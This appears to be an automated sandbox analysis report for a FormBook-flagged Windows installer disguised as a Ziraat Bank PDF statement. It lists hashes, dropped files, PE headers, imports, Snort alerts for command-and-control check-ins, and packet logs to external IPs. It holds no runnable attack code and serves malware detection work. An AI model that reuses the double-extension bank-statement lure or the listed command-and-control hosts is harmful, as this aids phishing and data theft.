                                                                                            SSDEEP:6144:b1Apbs8QgpUdjLQJYAbuiLFHWlqEbkuMtlY4k:ipFQgpwQJYAKcHW5kuMtV
                                                                                            MD5:A970E84ACDE64C70D2FFD66BACBAC590
                                                                                            SHA1:248548BE378949031E3836A2944947DC3AE3C40C
                                                                                            SHA-256:86CAA7A110192F9217BF5A4329E735B47C17C77327B8088C21361E4E3D2A5F74
                                                                                            SHA-512:461DBBA894AA782C65088B334D9DC9DC2F9E714881E17F6D3BAB6A083F7DC32561D6E21C0FD283159C3D43AE1EB0EC40679E072A5071DFB48EB99C7453333E51
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                            Reputation:low
                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c.................,..........M3............@.......................................@....................................@....@.......................P..,'..................................PA..............l...P............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data....0..........................@....00cfg....... ......................@..@.voltbl......0...........................rsrc........@......................@..@.reloc..,'...P...(..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\lrqaxxyu.p

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):5739
                                                                                            Entropy (8bit):7.1691943812398415
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Farc6oYWg/DrYuLYk2XO5oSwsacWiv08IbjdZrkwKOT8C8yKq481DJi6p:FarcROTYhX1ShZxv2ltkw6i11D7
                                                                                            MD5:F9D86B18F41EC7600A17CACABC4BD24D
                                                                                            SHA1:ADBF1ED9C3D5CBE7572570FBC0CB526F64FECE68
                                                                                            SHA-256:34602DEE15E5FEDA8F4164BBFB35FE71597B1C9AFC3373976231BE1821EA96F6
                                                                                            SHA-512:5CDACF8BABB5D7D931C8A6B87D327C8FE2EC74089519B0D0BB216B274E7AF779F5348A399296D3150FBFBCC04E2F33EE7D091BC07CB96807ABEE2A49E96BE43D
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                                            C:\Users\user\AppData\Local\Temp\nsf97A0.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):560158
                                                                                            Entropy (8bit):7.320655903379747
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:oFPaIjGSKrCrMxUw5Ru5W1pFQgpwQJYAKcHW5kuMtV:oFP5rKCMxn5z1fpPJYBoW5
                                                                                            MD5:9FB2FB82722F52F24DA0A5E8D7E289BD
                                                                                            SHA1:A00BEA5C44F873622BC005F9F1F6BF6D1DB438A2
                                                                                            SHA-256:E8B564F14AB7B39AD45DA1B3D14478981EF3BE25F5A3EF208F5A9F12F4BFB15A
                                                                                            SHA-512:14BD53984AFE82B55A0FB4EB6CD4F76A86BFAFB2A8C83A45AAF267C9C4157634D68BA23CF1E251F29E646016E28DD56D0B27449A55318BA85566D945F96CB22A
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.7......,........................".......6......v7..............................................................................E...........................................................................................................................................................G...................j...............................................................................................................................C...........b...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\otnuzljuxz.fl

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210453
                                                                                            Entropy (8bit):7.998883863047089
                                                                                            Encrypted:true
                                                                                            SSDEEP:6144:PFPzuYHj8bSKrCrycaEY34+2S3P6ARu5+ZPbM:PFPaIjGSKrCrMxUw5Ru5WM
                                                                                            MD5:6EF5F249712CCEDF43CD4202AB7E1358
                                                                                            SHA1:F33FF23393486D1E13A10F3D5DF837D343DB23EF
                                                                                            SHA-256:6A8117BB66EA69E1397629CB3BC3D61AFEE1BE0013ADEADB04386E44E4DB3A80
                                                                                            SHA-512:476E95BC855C2E881C14792740BCF5C0D885ED637C15E388D4FC14F24D862BFAAE76A5B06D0F74F65BC73D374705AF9573589624FA27EE74F5567472644C995D
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..sK+j.....o..Q.......k<.L..l..X..l.~.0.*%E..C......zR..~z,S..O...1......{...GzD.........`:..0.Y.......'.;....X.5.Y.......r`...egQ..Ob....DR.....HR....vC..O......w..I..rS]... ...t...$%D*.#.7.:.5..`....cR_....[..3..[..&.r..-1..w..2..6K@....h..{.gj.j...%c%[.6..4+....d.Q2I........~./.*.E..C......zR..Zz,S.....S.k..Z..0......i..M+.#.3..wX{?...c32X.\]X..A..."(!Y........H......[...g4...^R..q.e....=.@.L...,....I..rS].R......tM.d$.X:....G:I.5..`....M........3..[..&.8..-...w..2...K@....H..$.gj.j...%c%[.6.......d.Q.I.l..X..l.~.0.*%E..C......zR..Zz,S.....S.k..Z..0......i..M+.#.3..wX{?...c32X.\]X..A..."(!Y........H......[...g4...^R..q.e....=.@.L...,....I..rS]... ...t...$..:...JG:.5..`....M.......3..[..&.8..-...w..2...K@....H..$.gj.j...%c%[.6.......d.Q.I.l..X..l.~.0.*%E..C......zR..Zz,S.....S.k..Z..0......i..M+.#.3..wX{?...c32X.\]X..A..."(!Y........H......[...g4...^R..q.e....=.@.L...,....I..rS]... ...t...$..:...JG:.5..`....M.......3..[..&

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.951287827351969
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            File size:388797
                                                                                            MD5:ce02e10bf8de65619ae4296d38288219
                                                                                            SHA1:e8a6f91c9978e5604c9edc90b33001da3278b618
                                                                                            SHA256:24df0ccdc95c15d68f1bdee2d09ec3cd9fafbe9913cadacee75889d407cd8f84
                                                                                            SHA512:fa58fdc9ba7797394abf04d7551dfef519eafd2234f2d1644e502bae8b3e718038c3969b5ad29a71654dc4e0a581803143dadd432fa67f21b8950b3fd34b9157
                                                                                            SSDEEP:6144:vYa61AmQ4LtnYVg2eu/G8Ebxkm9/iJSIvEgXev2RQHqMQMZ6b2iHFSS29JRCbB:vY/AF4LtqgPu+LNk8LC7WHHW2Dsl
                                                                                            TLSH:BD84224CA2BBC0EFD9BB5B310A3D97ABE1E4C6100161C79B0331468EBF51642E94E739
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                            File Icon

                                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x403640
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 000003F4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            pop edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                            mov dword ptr [ebp-04h], 0040A230h
                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                            call dword ptr [004080C8h]
                                                                                            mov esi, dword ptr [004080CCh]
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            push eax
                                                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                                                            mov dword ptr [ebp-2Ch], ebx
                                                                                            mov dword ptr [ebp-28h], ebx
                                                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                            call esi
                                                                                            test eax, eax
                                                                                            jne 00007F06D4B76E1Ah
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                                                            push eax
                                                                                            call esi
                                                                                            mov ax, word ptr [ebp-0000012Ch]
                                                                                            mov ecx, dword ptr [ebp-00000112h]
                                                                                            sub ax, 00000053h
                                                                                            add ecx, FFFFFFD0h
                                                                                            neg ax
                                                                                            sbb eax, eax
                                                                                            mov byte ptr [ebp-26h], 00000004h
                                                                                            not eax
                                                                                            and eax, ecx
                                                                                            mov word ptr [ebp-2Ch], ax
                                                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                            jnc 00007F06D4B76DEAh
                                                                                            and word ptr [ebp-00000132h], 0000h
                                                                                            mov eax, dword ptr [ebp-00000134h]
                                                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                                                            mov dword ptr [0042A318h], eax
                                                                                            xor eax, eax
                                                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                                                            movzx eax, ax
                                                                                            or eax, ecx
                                                                                            xor ecx, ecx
                                                                                            mov ch, byte ptr [ebp-2Ch]
                                                                                            movzx ecx, cx
                                                                                            shl eax, 10h
                                                                                            or eax, ecx

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcf8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x3b0000xcf80xe00False0.42550223214285715data4.242310703358362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                                            RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                                                            RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                                                            RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                                                            RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                                                            RT_VERSION0x3b7580x25cdataEnglishUnited States
                                                                                            RT_MANIFEST0x3b9b80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                            Imports

                                                                                            DLLImport
                                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.2.3198.54.117.21649709802031453 02/18/23-13:07:11.131993TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.3198.54.117.216
                                                                                            192.168.2.3208.100.26.24549718802031453 02/18/23-13:07:43.249524TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3208.100.26.245
                                                                                            192.168.2.3198.54.117.21649709802031412 02/18/23-13:07:11.131993TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.3198.54.117.216
                                                                                            192.168.2.3208.100.26.24549718802031412 02/18/23-13:07:43.249524TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3208.100.26.245
                                                                                            192.168.2.38.8.8.862704532023883 02/18/23-13:05:18.631141UDP2023883ET DNS Query to a *.top domain - Likely Hostile6270453192.168.2.38.8.8.8
                                                                                            192.168.2.3198.54.117.21649709802031449 02/18/23-13:07:11.131993TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.3198.54.117.216
                                                                                            192.168.2.391.195.240.11749715802031449 02/18/23-13:07:32.618267TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.391.195.240.117
                                                                                            192.168.2.391.195.240.11749715802031453 02/18/23-13:07:32.618267TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.391.195.240.117
                                                                                            192.168.2.3208.100.26.24549718802031449 02/18/23-13:07:43.249524TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3208.100.26.245
                                                                                            192.168.2.391.195.240.11749715802031412 02/18/23-13:07:32.618267TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.391.195.240.117

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 18, 2023 13:05:19.658459902 CET4969780192.168.2.3107.148.8.96
                                                                                            Feb 18, 2023 13:05:19.865627050 CET8049697107.148.8.96192.168.2.3
                                                                                            Feb 18, 2023 13:05:19.865852118 CET4969780192.168.2.3107.148.8.96
                                                                                            Feb 18, 2023 13:05:19.865942001 CET4969780192.168.2.3107.148.8.96
                                                                                            Feb 18, 2023 13:05:20.073054075 CET8049697107.148.8.96192.168.2.3
                                                                                            Feb 18, 2023 13:05:20.073117971 CET8049697107.148.8.96192.168.2.3
                                                                                            Feb 18, 2023 13:05:20.073159933 CET8049697107.148.8.96192.168.2.3
                                                                                            Feb 18, 2023 13:05:20.073338985 CET4969780192.168.2.3107.148.8.96
                                                                                            Feb 18, 2023 13:05:20.073426008 CET4969780192.168.2.3107.148.8.96
                                                                                            Feb 18, 2023 13:05:20.280586004 CET8049697107.148.8.96192.168.2.3
                                                                                            Feb 18, 2023 13:05:30.205110073 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:05:33.219310999 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:05:39.282449007 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:05:52.399204969 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:05:55.393091917 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:01.393589020 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:14.503300905 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:17.582577944 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:23.598617077 CET4969880192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:36.226308107 CET4970080192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:39.225135088 CET4970080192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:43.736856937 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:43.913501024 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:43.913752079 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:43.914007902 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:44.090468884 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177194118 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177252054 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177272081 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177292109 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177309036 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177325964 CET8049701184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:44.177464008 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:44.177556038 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:45.241039991 CET4970080192.168.2.3194.102.227.30
                                                                                            Feb 18, 2023 13:06:45.428735971 CET4970180192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:46.446372032 CET4970280192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:46.621828079 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.622437954 CET4970280192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:46.623006105 CET4970280192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:46.797413111 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.797440052 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.797533989 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904504061 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904542923 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904563904 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904584885 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904601097 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904618025 CET8049702184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:46.904678106 CET4970280192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:48.132211924 CET4970280192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.156606913 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.331123114 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.331227064 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.331402063 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.505644083 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600657940 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600687981 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600708961 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600728989 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600758076 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:49.600863934 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.600904942 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.601777077 CET4970380192.168.2.3184.94.215.91
                                                                                            Feb 18, 2023 13:06:49.776277065 CET8049703184.94.215.91192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.736001015 CET4970480192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:54.836098909 CET804970466.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.836421013 CET4970480192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:54.836949110 CET4970480192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:54.935199976 CET804970466.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.950476885 CET804970466.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.950520992 CET804970466.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.950721979 CET4970480192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:56.351727009 CET4970480192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:57.367896080 CET4970580192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:57.470778942 CET804970566.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:57.474889040 CET4970580192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:57.475841999 CET4970580192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:57.579497099 CET804970566.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:57.579543114 CET804970566.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:57.593218088 CET804970566.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:57.593259096 CET804970566.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:06:57.593341112 CET4970580192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:58.976710081 CET4970580192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:06:59.992769957 CET4970680192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:07:00.092741013 CET804970666.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:07:00.092983961 CET4970680192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:07:00.093044043 CET4970680192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:07:00.191446066 CET804970666.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:07:00.226228952 CET804970666.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:07:00.226289988 CET804970666.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:07:00.226623058 CET4970680192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:07:00.226847887 CET4970680192.168.2.366.96.162.149
                                                                                            Feb 18, 2023 13:07:00.325131893 CET804970666.96.162.149192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.288954973 CET4970780192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:05.462331057 CET8049707198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.464544058 CET4970780192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:05.468234062 CET4970780192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:05.641364098 CET8049707198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.641413927 CET8049707198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.641443968 CET8049707198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.641494036 CET4970780192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:06.974030972 CET4970780192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:08.160952091 CET4970880192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:08.334373951 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.353070974 CET4970880192.168.2.3198.54.117.216
